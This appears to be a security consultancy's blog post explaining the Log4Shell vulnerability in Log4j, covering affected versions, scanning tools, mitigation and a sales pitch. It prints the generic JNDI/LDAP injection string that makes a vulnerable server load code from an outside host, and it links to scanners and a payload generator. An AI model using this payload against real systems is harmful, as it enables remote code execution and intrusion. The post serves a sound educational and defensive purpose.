Skip to content

Detox Technologies

What Is Log4Shell? The Log4j Vulnerability Explained

Log4Shell (CVE-2021-44228) was a zero-day vulnerability in Log4j, a popular Java logging framework, involving arbitrary code execution. The vulnerability has existed unnoticed since 2013 and was privately disclosed to the Apache Software Foundation, of which Log4j is a project, by Chen Zhaojun of Alibaba Cloud’s security team on 24 November 2021, and was publicly disclosed on 9 December 2021

What is Log4J?

Log4j is a Java-based logging utility that is part of the Apache Logging Services. Log4j is one of the several Java logging frameworks which is popularly used by millions of Java applications on the internet.

Apache gave Log4Shell a CVSS severity rating of 10, the highest available score. The exploit is simple to execute and is estimated to affect hundreds of millions of devices.

 

Image Source: GovCERT.ch

This allows attackers to:

  • Access the entire network through the affected device or application
  • Run any code
  • Access all data on the affected device or application
  • Delete or encrypt files

What Devices and Applications are Vulnerable to Log4Shell?

If a device that is connected to the internet runs Apache Log4j, versions 2.0-to-2.14.1, then they are vulnerable to Log4Shell.

Vulnerability Type Remote Code Execution

Severity Critical

Base CVSS Score 10.0

Versions Affected All versions from 2.0-beta9 to 2.14.1

Log4j Vulnerability Detection:

There are certain tools to scan the packages for the presence of Log4j vulnerability. They are as follows.

How to download and install Log4j Detect in 2022?

Log4j Detect is a free CLI tool that quickly scans your projects to find vulnerable Log4j versions containing the following known CVEs:

  • CVE-2021-45046
  • CVE-2021-44228
  • CVE-2021-4104
  • CVE-2021-45105
  • CVE-2021-44832

It provides the exact path to direct and indirect dependencies, along with the fixed version for speedy remediation.

In addition, this tool will search for vulnerable files with the .jar,.gem extensions.

Additional Log4j RCE Scanners:

  1. https://github.com/qq529952515/HackLog4j
  2. https://github.com/0xInfection/LogMePwn
  3. https://github.com/Diverto/nse-log4shell
  4. https://github.com/woodpecker-appstore/log4j-payload-generator
  5. https://github.com/fullhunt/log4j-scan
  6. https://github.com/fox-it/log4j-finder
  7. https://github.com/izj007/Log4j2Scan
  8. https://github.com/proferosec/log4jScanner
  9. https://github.com/f0ng/log4j2burpscanner
  10. https://github.com/adilsoybali/Log4j-RCE-Scanner

Exploit Log4j Scenario

An attacker who can control log messages or log messages parameters can execute arbitrary code on the vulnerable server loaded from LDAP servers when message lookup substitution is enabled. As a result, an attacker can craft a special request that would make the utility remotely downloaded and execute the payload.

what is Log4Shell Image Source: Purplebox

Below is the most common example of it using the combination of JNDI and LDAP:

${jndi:ldap://<host>:<port>/<payload>}

Mitigation

The vendor has released a fix and the customers are advised to update their Log4j to version 2.16.0 an above, if updating the version is possible. This advice and the following methods help mitigate the impacts of vulnerability:

Update your servers

The best fix against these vulnerabilities is to patch log4j to 2.16.0 and above:

Log4j 1.x mitigation: Log4j 1.x is not impacted by this vulnerability.

Log4j 2.x mitigation: Implement one of the mitigation techniques below.

  • Java 8 (or later) users should upgrade to release 2.16.0.
  • Users requiring Java 7 should upgrade to release 2.12.2 when it becomes available (work in progress, expected to be available soon).
  • Otherwise, remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

 

Read More Articles About Cyber Security

Conclusion

In this blog post, we’ve briefly explained what is Log4Shell is, why the vulnerability is important, how it can be exploited, and some remediation advice to protect ourselves against this vulnerability. Also, we shared some useful tools, all of which are capable of scanning and detecting the vulnerability. We hope you enjoyed it! Stay safe from cyber-attacks!


Detox Technologies is an ISO 27001-2013 certified Global Consultation and Implementation company, Headquartered in derbyshire UK & R&D Center in Delhi. We believe in precision and quality above everything else.

We are the trusted standard for companies and individuals acquiring services to protect their brands, businesses and dignity from baffling Cyber-attacks. We provide end to end cyber security solutions to our clients.

Our thrust on securing the People-Process-Technology has enabled us to offer impenetrable security to our clients across the world. Our success stories are translated in the form of positive testimonials from our growing list of clients.


For More Info About—- Cyber Security Consulting

Call Now—+91 9711761704, +91 9289014236

Address:—Detox Technologies, Pinnacle Tower, G-06, Ground Floor, Block A, Industrial Area, Sector-62, Noida 201309